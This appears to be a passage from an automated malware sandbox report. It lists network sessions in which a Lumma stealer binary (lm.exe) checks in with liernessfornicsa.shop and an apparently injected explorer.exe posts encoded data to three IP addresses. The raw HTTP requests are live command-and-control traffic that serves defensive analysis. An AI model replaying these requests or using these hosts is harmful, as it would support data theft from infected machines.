                                                                                    2024-07-24 17:57:40 UTC1122OUTData Raw: 6a 78 53 4b 6d 55 78 48 71 6a 35 77 42 64 51 73 44 35 45 57 52 42 53 4e 4b 69 6d 5a 70 52 35 73 53 70 42 62 2b 35 55 6a 51 64 53 76 65 49 42 78 72 69 4a 30 55 65 56 7a 56 67 54 57 61 36 61 65 6b 4a 6c 4e 7a 57 5a 5a 31 45 64 73 55 42 33 72 2f 76 31 50 2b 74 63 48 4d 64 78 72 42 77 45 64 6d 56 62 54 5a 4e 48 63 5a 75 6b 64 74 70 79 42 50 38 49 67 77 6e 76 46 49 41 73 4b 56 46 53 50 38 47 7a 38 51 34 2f 43 52 44 56 75 72 66 61 61 6e 6d 73 6d 4f 77 30 66 37 33 48 4a 62 50 73 66 6b 66 55 70 74 76 6e 2f 46 47 62 30 42 69 48 67 31 61 30 73 4f 51 65 4f 56 77 6e 6a 4f 70 71 4d 69 72 62 47 72 49 76 36 4e 54 65 37 68 51 4a 41 77 73 31 75 76 47 4f 6e 77 58 75 58 68 46 58 51 61 5a 50 4d 64 6c 46 4a 58 58 76 43 6f 5a 79 53 59 67 36 76 65 30 68 78 62 45 61 56 47 2b 54
                                                                                    Data Ascii: jxSKmUxHqj5wBdQsD5EWRBSNKimZpR5sSpBb+5UjQdSveIBxriJ0UeVzVgTWa6aekJlNzWZZ1EdsUB3r/v1P+tcHMdxrBwEdmVbTZNHcZukdtpyBP8IgwnvFIAsKVFSP8Gz8Q4/CRDVurfaanmsmOw0f73HJbPsfkfUptvn/FGb0BiHg1a0sOQeOVwnjOpqMirbGrIv6NTe7hQJAws1uvGOnwXuXhFXQaZPMdlFJXXvCoZySYg6ve0hxbEaVG+T
                                                                                    2024-07-24 17:57:42 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:41 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:42 UTC685INData Raw: 59 2f 30 62 44 48 75 4b 65 4a 73 50 52 55 4e 42 48 78 73 73 53 2b 41 64 51 50 58 51 4a 6e 4c 61 4d 68 48 58 68 41 76 6b 31 32 56 73 5a 49 54 65 2f 52 50 74 42 4f 72 63 4c 77 30 58 54 35 41 32 5a 37 6c 36 4c 7a 35 77 5a 78 77 5a 76 58 74 74 71 58 30 70 6e 43 41 4e 35 74 44 4b 51 75 4b 4e 6c 6a 2b 6f 75 5a 6e 72 38 55 73 34 63 38 42 72 4a 6e 6f 65 5a 4c 38 4e 6a 37 7a 54 6b 79 4d 70 37 76 2b 54 59 49 4c 7a 4c 43 45 7a 48 44 65 71 70 53 79 77 75 35 54 36 36 75 51 50 58 6e 70 35 43 56 59 4d 45 77 68 36 42 73 59 62 73 6d 61 6b 37 62 31 62 64 46 66 46 41 6c 58 2f 34 6c 71 72 6e 72 44 4d 43 51 63 76 56 4c 45 33 50 41 71 56 50 59 66 4a 56 57 53 46 41 79 32 6c 54 4a 68 52 45 46 65 44 59 76 74 58 33 48 4a 77 79 32 6a 37 37 4a 4b 32 4d 55 34 35 44 70 65 39 31 49 41
                                                                                    Data Ascii: Y/0bDHuKeJsPRUNBHxssS+AdQPXQJnLaMhHXhAvk12VsZITe/RPtBOrcLw0XT5A2Z7l6Lz5wZxwZvXttqX0pnCAN5tDKQuKNlj+ouZnr8Us4c8BrJnoeZL8Nj7zTkyMp7v+TYILzLCEzHDeqpSywu5T66uQPXnp5CVYMEwh6BsYbsmak7b1bdFfFAlX/4lqrnrDMCQcvVLE3PAqVPYfJVWSFAy2lTJhREFeDYvtX3HJwy2j77JK2MU45Dpe91IA


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    54192.168.2.1049804167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:42 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:42 UTC1122OUTData Raw: 56 4a 38 41 51 4c 6a 46 70 33 57 57 73 33 68 45 49 49 4a 4d 72 72 76 59 64 6e 6d 42 31 75 5a 30 39 4e 6e 6f 59 71 6b 6d 4d 66 6e 38 66 6c 66 79 65 41 74 35 5a 66 54 52 4a 34 45 70 66 4f 43 73 65 61 35 78 4d 75 37 65 6d 50 65 78 7a 4f 34 71 4c 51 31 67 37 72 70 2f 4e 36 7a 77 41 4c 33 46 79 48 70 41 4a 4a 64 38 2b 6e 30 66 59 38 62 30 4e 69 31 78 75 4d 69 52 33 68 57 6c 67 30 70 7a 58 42 44 42 61 36 54 2b 63 70 79 57 64 43 32 6d 65 77 63 5a 2f 70 63 42 78 45 31 62 6f 56 6d 39 71 4a 73 76 4c 57 34 6f 41 5a 52 72 4e 73 49 74 55 65 37 38 2f 77 62 6d 7a 33 30 31 33 6a 74 43 75 70 41 57 69 32 43 77 58 73 61 58 37 58 43 58 55 73 34 41 45 35 63 64 36 4a 36 67 4b 62 61 5a 44 32 67 53 49 68 73 45 4f 59 45 54 75 71 4a 32 64 30 52 6e 4e 4a 6e 48 6e 55 4b 6c 79 6f 65
                                                                                    Data Ascii: VJ8AQLjFp3WWs3hEIIJMrrvYdnmB1uZ09NnoYqkmMfn8flfyeAt5ZfTRJ4EpfOCsea5xMu7emPexzO4qLQ1g7rp/N6zwAL3FyHpAJJd8+n0fY8b0Ni1xuMiR3hWlg0pzXBDBa6T+cpyWdC2mewcZ/pcBxE1boVm9qJsvLW4oAZRrNsItUe78/wbmz3013jtCupAWi2CwXsaX7XCXUs4AE5cd6J6gKbaZD2gSIhsEOYETuqJ2d0RnNJnHnUKlyoe
                                                                                    2024-07-24 17:57:43 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:43 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:43 UTC685INData Raw: 52 38 34 72 4a 76 4d 46 48 76 54 7a 78 43 36 34 6a 6a 61 55 54 6e 49 6f 75 6d 35 52 31 67 56 46 65 75 45 64 36 56 6d 2f 43 49 4b 6a 53 48 52 6d 67 63 66 36 54 37 4f 64 38 45 75 69 7a 42 63 4b 56 34 4f 43 4e 55 6c 6c 41 69 48 4f 48 52 47 65 4c 4b 30 76 62 36 68 35 48 41 63 54 73 38 4e 62 72 34 31 68 66 44 76 65 34 57 6c 59 78 39 5a 53 4a 51 70 56 4c 59 77 4f 74 68 75 46 56 6b 58 64 45 31 6f 33 70 73 76 42 31 67 55 77 36 31 31 49 6f 78 41 46 76 47 66 31 6e 4b 57 75 6e 66 42 76 61 71 55 31 41 42 4a 44 32 52 62 46 4b 64 76 73 53 53 4d 52 70 30 59 64 35 4e 61 4e 6f 55 41 6b 6d 46 53 37 4e 77 49 6a 59 51 49 37 58 41 56 67 32 31 66 53 6c 62 78 48 5a 48 35 35 58 2b 4f 49 76 57 6d 41 52 74 4f 65 39 70 53 6d 4c 72 57 4a 65 5a 2b 74 4c 61 30 76 50 48 4d 64 68 77 6c
                                                                                    Data Ascii: R84rJvMFHvTzxC64jjaUTnIoum5R1gVFeuEd6Vm/CIKjSHRmgcf6T7Od8EuizBcKV4OCNUllAiHOHRGeLK0vb6h5HAcTs8Nbr41hfDve4WlYx9ZSJQpVLYwOthuFVkXdE1o3psvB1gUw611IoxAFvGf1nKWunfBvaqU1ABJD2RbFKdvsSSMRp0Yd5NaNoUAkmFS7NwIjYQI7XAVg21fSlbxHZH55X+OIvWmARtOe9pSmLrWJeZ+tLa0vPHMdhwl


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    55192.168.2.1049803172.67.213.854437864C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:44 UTC268OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: liernessfornicsa.shop
                                                                                    2024-07-24 17:57:44 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-07-24 17:57:45 UTC812INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:57:45 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=8b0v36ffggp1b1fnv5qb4ur2eu; expires=Sun, 17-Nov-2024 11:44:23 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jKFn%2BTUiLK%2BW2rcw8C0aGQsGPAs1yC8zJ5MccNCWneLPEblJGU9%2BQ99lLZkHcRrILYrClHi%2BGknod6D2mfLF8hqw2pwHc%2B7GLhIoXUXCkEao4i5O2ZswsawPp3vxj5Qu%2FHMLQoRL0j0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85cb591c0c4327-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-07-24 17:57:45 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                    Data Ascii: 2ok
                                                                                    2024-07-24 17:57:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    56192.168.2.1049806107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:44 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:44 UTC1122OUTData Raw: 49 61 77 74 64 32 50 39 43 57 61 61 6c 58 72 53 35 43 75 47 4c 6a 67 50 56 58 72 76 46 68 75 71 36 71 6f 42 31 63 55 52 6e 6b 55 4d 2f 55 46 6c 64 33 56 54 53 47 4e 79 4a 6c 4e 30 4d 31 4e 6e 71 48 76 67 75 5a 56 6f 35 6d 4e 6c 61 47 44 57 6b 50 42 4e 44 51 43 63 48 78 62 6f 54 38 69 4d 6f 73 55 59 67 57 58 47 4b 79 6e 48 7a 31 50 70 4e 34 66 43 77 37 79 5a 49 51 34 7a 43 4c 70 58 7a 65 69 39 6c 54 36 4a 6a 4e 59 32 59 6b 2b 35 66 4f 39 32 66 7a 31 6c 2b 53 2f 64 2f 6d 54 57 53 31 6e 66 53 52 52 6d 43 5a 71 79 2f 4e 6f 59 72 6f 48 2b 58 36 50 65 62 36 78 5a 51 63 74 42 4e 6e 6a 41 69 70 49 65 36 30 38 53 67 46 6a 53 42 5a 4e 42 5a 49 46 6f 37 41 58 43 78 63 51 74 67 48 44 30 79 55 41 54 53 65 51 61 53 74 5a 4b 50 78 48 45 6c 48 59 34 4a 46 45 44 6d 30 79
                                                                                    Data Ascii: Iawtd2P9CWaalXrS5CuGLjgPVXrvFhuq6qoB1cURnkUM/UFld3VTSGNyJlN0M1NnqHvguZVo5mNlaGDWkPBNDQCcHxboT8iMosUYgWXGKynHz1PpN4fCw7yZIQ4zCLpXzei9lT6JjNY2Yk+5fO92fz1l+S/d/mTWS1nfSRRmCZqy/NoYroH+X6Peb6xZQctBNnjAipIe608SgFjSBZNBZIFo7AXCxcQtgHD0yUATSeQaStZKPxHElHY4JFEDm0y
                                                                                    2024-07-24 17:57:45 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:45 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:45 UTC685INData Raw: 6d 65 73 59 71 4c 76 67 51 54 64 37 42 65 66 4a 50 53 6f 45 72 31 77 56 34 33 79 58 53 38 77 48 32 76 2f 36 49 36 55 55 45 73 73 75 73 4a 6c 58 79 77 31 73 39 43 47 6b 69 61 34 69 71 54 48 31 73 30 69 39 4f 47 6a 37 43 4c 37 65 2f 75 6d 47 36 66 62 73 33 79 53 50 6f 61 5a 6c 43 53 4d 2b 6e 62 35 46 39 36 4a 63 75 5a 66 6c 33 2b 76 72 43 6a 4c 53 43 48 62 70 51 51 56 7a 31 6f 2f 58 38 30 46 73 42 76 46 53 68 70 76 68 75 62 59 69 54 54 51 30 70 72 39 58 42 43 6d 53 75 6b 54 53 74 62 43 79 50 2b 6c 63 33 46 55 38 76 33 6b 67 59 6f 31 4f 36 31 6f 69 30 54 64 76 42 7a 51 6d 37 69 36 43 56 6f 77 37 37 79 72 45 39 42 69 36 61 65 35 35 79 37 48 67 4b 42 6b 7a 6d 7a 57 30 45 4b 46 44 66 74 6a 4e 38 75 64 68 64 37 59 75 31 2f 7a 46 45 2f 43 34 33 57 52 42 4e 49 65
                                                                                    Data Ascii: mesYqLvgQTd7BefJPSoEr1wV43yXS8wH2v/6I6UUEssusJlXyw1s9CGkia4iqTH1s0i9OGj7CL7e/umG6fbs3ySPoaZlCSM+nb5F96JcuZfl3+vrCjLSCHbpQQVz1o/X80FsBvFShpvhubYiTTQ0pr9XBCmSukTStbCyP+lc3FU8v3kgYo1O61oi0TdvBzQm7i6CVow77yrE9Bi6ae55y7HgKBkzmzW0EKFDftjN8udhd7Yu1/zFE/C43WRBNIe


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    57192.168.2.1049808107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:46 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:46 UTC1122OUTData Raw: 6e 76 38 72 2b 32 62 69 2b 42 44 6d 6e 54 30 59 49 58 53 59 47 6c 4f 76 49 2b 70 54 37 4e 59 33 7a 36 61 6d 51 6d 4f 73 6b 52 56 71 53 76 70 4d 4c 76 39 43 50 6a 42 36 6a 67 6d 54 2b 47 52 33 6c 6b 6d 70 6a 45 4e 31 71 43 6c 41 43 68 4b 61 69 59 36 34 70 43 4a 33 4a 42 73 34 42 38 37 50 69 30 30 6f 41 56 4a 32 74 41 33 38 7a 45 6d 61 6e 52 46 64 4a 75 67 61 64 50 56 63 42 53 6e 2b 39 62 37 61 6e 42 47 48 34 33 51 56 48 78 31 39 61 47 50 66 50 2b 47 33 79 46 43 59 4e 73 51 45 5a 69 53 6a 47 44 73 35 68 32 55 32 4d 6f 58 37 6c 69 2f 37 46 37 31 54 31 59 79 30 55 73 7a 7a 76 70 63 55 50 54 7a 33 61 57 2b 48 73 4e 4c 69 5a 6b 6a 51 72 63 31 62 73 35 32 6a 67 75 39 74 6c 55 68 79 67 74 2f 54 61 58 4d 64 52 73 63 66 30 52 58 6c 47 49 65 73 50 4f 75 53 2b 74 77
                                                                                    Data Ascii: nv8r+2bi+BDmnT0YIXSYGlOvI+pT7NY3z6amQmOskRVqSvpMLv9CPjB6jgmT+GR3lkmpjEN1qClAChKaiY64pCJ3JBs4B87Pi00oAVJ2tA38zEmanRFdJugadPVcBSn+9b7anBGH43QVHx19aGPfP+G3yFCYNsQEZiSjGDs5h2U2MoX7li/7F71T1Yy0UszzvpcUPTz3aW+HsNLiZkjQrc1bs52jgu9tlUhygt/TaXMdRscf0RXlGIesPOuS+tw
                                                                                    2024-07-24 17:57:48 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:47 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:48 UTC685INData Raw: 54 4f 74 77 6c 46 7a 6d 6b 50 62 30 35 6d 38 72 33 46 59 78 62 72 2b 32 6b 50 4d 42 6a 48 4b 44 2f 33 56 34 76 32 59 59 4e 4f 72 55 54 58 7a 32 6d 46 6d 52 6b 6a 58 36 6c 51 77 73 78 4c 37 53 4b 63 59 49 78 7a 4a 76 53 43 61 61 4b 63 2f 39 6f 47 70 4b 79 61 2f 55 39 38 50 57 52 65 72 78 31 34 37 45 47 70 53 30 69 37 64 65 4e 57 67 49 41 5a 6c 76 2f 57 31 78 66 4d 51 47 37 54 49 67 43 2f 33 4a 49 36 79 6c 49 67 6d 79 6e 45 46 36 4e 4d 4d 30 61 67 36 57 66 61 51 64 55 71 72 75 6d 51 69 4d 30 6c 64 41 4e 33 66 42 41 66 4e 4a 34 38 41 6f 49 4b 4b 64 62 78 62 55 59 4b 77 42 56 37 49 79 50 4e 47 57 53 4d 61 57 77 59 6d 32 73 6e 34 4a 5a 73 35 48 70 52 32 34 6c 56 4f 78 43 65 37 41 61 73 58 74 72 57 46 36 68 4f 2b 35 38 67 67 75 7a 50 7a 39 72 4a 48 31 54 61 76
                                                                                    Data Ascii: TOtwlFzmkPb05m8r3FYxbr+2kPMBjHKD/3V4v2YYNOrUTXz2mFmRkjX6lQwsxL7SKcYIxzJvSCaaKc/9oGpKya/U98PWRerx147EGpS0i7deNWgIAZlv/W1xfMQG7TIgC/3JI6ylIgmynEF6NMM0ag6WfaQdUqrumQiM0ldAN3fBAfNJ48AoIKKdbxbUYKwBV7IyPNGWSMaWwYm2sn4JZs5HpR24lVOxCe7AasXtrWF6hO+58gguzPz9rJH1Tav


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    58192.168.2.1049809167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:48 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:48 UTC1122OUTData Raw: 6f 50 6b 41 30 7a 59 6c 74 46 66 36 58 67 63 2b 4a 64 77 4a 4e 5a 55 36 49 38 77 79 4e 69 55 47 77 61 5a 61 6c 47 46 30 54 4c 63 76 61 38 48 54 68 6b 6b 4c 4c 4a 4c 59 54 35 46 63 4d 61 6f 67 73 7a 6b 64 76 30 56 6c 2b 73 4c 61 75 72 42 31 61 36 72 49 70 4d 44 30 4b 31 57 39 37 54 63 38 79 6b 51 47 51 54 44 58 64 54 45 44 65 37 67 6e 58 46 30 6f 72 70 6f 73 4e 75 6a 79 74 5a 67 4a 57 30 79 6f 4e 35 72 6e 39 65 41 58 4c 61 68 76 68 42 75 37 41 42 30 79 30 4a 67 73 34 7a 33 50 4a 71 36 6d 64 59 6e 69 45 47 4a 52 74 4c 59 56 50 58 45 48 67 5a 4f 4e 62 33 64 50 56 67 33 73 6e 4c 37 34 39 64 65 4a 4b 4e 66 66 33 71 56 76 79 2f 73 6c 4d 6d 31 70 78 6e 74 69 2f 68 4b 42 53 46 37 71 56 32 53 4b 36 31 37 73 73 4c 73 6e 73 6f 4f 56 39 4a 5a 6d 4c 73 59 39 51 65 4f
                                                                                    Data Ascii: oPkA0zYltFf6Xgc+JdwJNZU6I8wyNiUGwaZalGF0TLcva8HThkkLLJLYT5FcMaogszkdv0Vl+sLaurB1a6rIpMD0K1W97Tc8ykQGQTDXdTEDe7gnXF0orposNujytZgJW0yoN5rn9eAXLahvhBu7AB0y0Jgs4z3PJq6mdYniEGJRtLYVPXEHgZONb3dPVg3snL749deJKNff3qVvy/slMm1pxnti/hKBSF7qV2SK617ssLsnsoOV9JZmLsY9QeO
                                                                                    2024-07-24 17:57:49 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:49 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:49 UTC685INData Raw: 51 62 77 4f 65 55 68 53 59 4a 6f 2b 5a 6d 56 2b 50 2b 63 59 4b 42 6b 6b 6d 4d 70 55 74 67 42 4a 38 61 4c 4c 6b 45 35 51 42 34 48 54 77 32 2f 55 50 58 42 70 79 55 6d 43 6d 44 4b 43 4d 6e 70 7a 35 50 69 4f 30 41 46 37 67 6b 78 57 31 77 6e 77 45 63 36 64 66 57 76 67 4b 53 4f 75 4f 77 74 65 56 48 69 4e 35 6b 4a 48 45 5a 41 73 4b 31 38 35 35 4b 33 75 77 75 39 55 52 66 33 67 71 59 69 42 50 43 44 6b 49 63 43 2b 36 44 52 65 6b 6d 6c 35 6b 74 6f 59 4c 67 6d 6e 6e 6d 34 49 74 38 31 41 55 71 75 69 63 6c 35 70 53 74 6d 6f 4c 75 73 54 38 6f 4d 50 62 6d 66 66 4d 57 46 48 4f 44 48 2f 49 50 56 50 4f 32 4c 57 64 61 66 79 2f 41 64 7a 75 75 72 56 35 37 63 4b 69 53 79 79 39 4c 56 56 44 74 75 7a 39 59 34 55 31 42 66 51 57 4b 46 59 36 6a 6f 35 63 50 64 6c 31 58 49 47 46 5a 39
                                                                                    Data Ascii: QbwOeUhSYJo+ZmV+P+cYKBkkmMpUtgBJ8aLLkE5QB4HTw2/UPXBpyUmCmDKCMnpz5PiO0AF7gkxW1wnwEc6dfWvgKSOuOwteVHiN5kJHEZAsK1855K3uwu9URf3gqYiBPCDkIcC+6DRekml5ktoYLgmnnm4It81AUquicl5pStmoLusT8oMPbmffMWFHODH/IPVPO2LWdafy/AdzuurV57cKiSyy9LVVDtuz9Y4U1BfQWKFY6jo5cPdl1XIGFZ9


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    59192.168.2.1049810107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:50 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:50 UTC1122OUTData Raw: 50 54 6c 56 50 55 70 57 6d 79 44 66 53 38 6f 49 4d 73 62 4f 4b 6c 56 62 73 35 59 2f 7a 7a 4d 68 38 32 4f 64 73 74 73 73 67 61 4b 72 58 37 62 67 75 33 6b 63 49 44 4b 34 38 73 4d 75 54 4b 66 45 47 56 73 4b 48 46 70 78 58 78 5a 48 33 54 31 35 70 73 77 31 39 52 6b 32 43 58 6c 38 58 31 68 57 6b 4b 5a 73 45 42 6d 30 58 30 69 47 35 64 65 71 79 66 6f 48 4a 54 2f 49 63 63 32 47 34 2b 70 37 66 7a 59 2b 4d 53 6e 31 66 52 2f 71 4f 47 67 5a 45 52 45 74 36 63 43 78 41 62 4a 56 53 36 54 48 68 34 42 41 79 4a 37 51 30 6d 75 57 54 69 48 4e 33 7a 4f 32 48 59 4e 75 54 2f 74 7a 52 54 51 4e 56 64 56 56 63 79 42 32 48 30 32 47 6d 73 41 39 32 42 33 68 74 49 70 47 2b 62 50 74 4f 43 52 50 32 2b 6a 68 47 39 4e 47 4f 38 64 74 55 69 41 45 2b 47 61 73 2f 53 76 6a 57 52 43 6f 2b 52 49
                                                                                    Data Ascii: PTlVPUpWmyDfS8oIMsbOKlVbs5Y/zzMh82OdstssgaKrX7bgu3kcIDK48sMuTKfEGVsKHFpxXxZH3T15psw19Rk2CXl8X1hWkKZsEBm0X0iG5deqyfoHJT/Icc2G4+p7fzY+MSn1fR/qOGgZEREt6cCxAbJVS6THh4BAyJ7Q0muWTiHN3zO2HYNuT/tzRTQNVdVVcyB2H02GmsA92B3htIpG+bPtOCRP2+jhG9NGO8dtUiAE+Gas/SvjWRCo+RI
                                                                                    2024-07-24 17:57:51 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:51 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:51 UTC685INData Raw: 4a 6d 34 62 58 42 69 36 43 70 5a 77 4f 6a 4f 6f 71 4b 67 39 79 33 35 48 64 57 74 4e 49 41 38 67 37 47 46 45 50 54 5a 36 51 31 44 58 33 2b 4b 73 44 67 4f 67 63 6d 6d 57 44 33 6e 39 30 4e 52 73 64 77 36 71 57 75 52 56 65 69 68 4d 44 72 31 51 36 6e 51 75 38 4e 79 69 78 52 4e 70 4b 72 4f 6b 4b 2f 77 39 44 4b 37 57 43 76 77 58 6f 34 7a 4f 47 6b 63 63 4c 32 44 38 2f 30 45 71 6c 72 7a 62 4d 2b 2f 38 6d 2f 72 47 73 58 35 2b 61 46 4d 4e 4a 2b 4b 62 4f 35 4d 44 32 45 4b 5a 77 79 49 52 72 46 2b 55 35 6a 62 6e 6f 2b 47 51 35 4a 54 66 77 79 33 30 4b 6a 43 36 47 66 74 6d 41 73 59 42 42 4c 6b 4d 71 31 4e 4b 6e 77 48 6f 78 44 52 35 64 68 42 56 6b 2f 76 51 30 6f 75 64 43 6b 74 67 48 65 61 42 6a 4a 37 30 59 54 41 57 46 45 6b 69 4d 38 52 4c 48 69 75 45 61 35 39 4c 74 49 49
                                                                                    Data Ascii: Jm4bXBi6CpZwOjOoqKg9y35HdWtNIA8g7GFEPTZ6Q1DX3+KsDgOgcmmWD3n90NRsdw6qWuRVeihMDr1Q6nQu8NyixRNpKrOkK/w9DK7WCvwXo4zOGkccL2D8/0EqlrzbM+/8m/rGsX5+aFMNJ+KbO5MD2EKZwyIRrF+U5jbno+GQ5JTfwy30KjC6GftmAsYBBLkMq1NKnwHoxDR5dhBVk/vQ0oudCktgHeaBjJ70YTAWFEkiM8RLHiuEa59LtII


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    60192.168.2.1049811107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:52 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:52 UTC1122OUTData Raw: 6a 4e 4a 44 54 4f 54 6f 41 69 39 48 7a 41 41 78 50 33 41 50 31 65 74 7a 37 79 41 76 62 46 6d 6e 51 4c 68 44 6f 37 51 39 39 34 6c 5a 34 5a 63 2b 6b 51 2f 2f 4e 6e 50 31 59 39 5a 58 63 62 45 50 41 33 39 50 58 7a 74 64 35 62 2f 71 6e 38 45 6f 47 47 7a 65 57 38 64 73 68 67 35 55 56 59 38 75 4a 33 59 73 61 55 36 31 2b 47 4d 78 79 71 75 38 38 32 63 47 37 30 6b 52 53 79 34 4c 62 4d 6a 2b 66 54 58 6d 44 63 78 48 57 30 32 32 4a 50 50 49 75 58 7a 62 32 58 32 75 70 67 30 53 45 6a 37 64 6c 5a 5a 6a 56 6b 35 30 32 52 64 32 37 51 50 4a 48 79 46 30 43 51 53 56 4b 38 7a 38 32 68 2f 7a 6e 2b 64 4d 2f 68 68 61 49 77 41 33 72 68 77 31 50 6f 79 76 49 64 38 73 33 51 70 71 4e 57 71 77 4d 42 33 72 53 4b 44 79 41 6f 44 44 56 4f 4f 50 37 67 38 6a 58 51 4e 53 51 6e 77 33 79 56 70
                                                                                    Data Ascii: jNJDTOToAi9HzAAxP3AP1etz7yAvbFmnQLhDo7Q994lZ4Zc+kQ//NnP1Y9ZXcbEPA39PXztd5b/qn8EoGGzeW8dshg5UVY8uJ3YsaU61+GMxyqu882cG70kRSy4LbMj+fTXmDcxHW022JPPIuXzb2X2upg0SEj7dlZZjVk502Rd27QPJHyF0CQSVK8z82h/zn+dM/hhaIwA3rhw1PoyvId8s3QpqNWqwMB3rSKDyAoDDVOOP7g8jXQNSQnw3yVp
                                                                                    2024-07-24 17:57:54 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:53 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
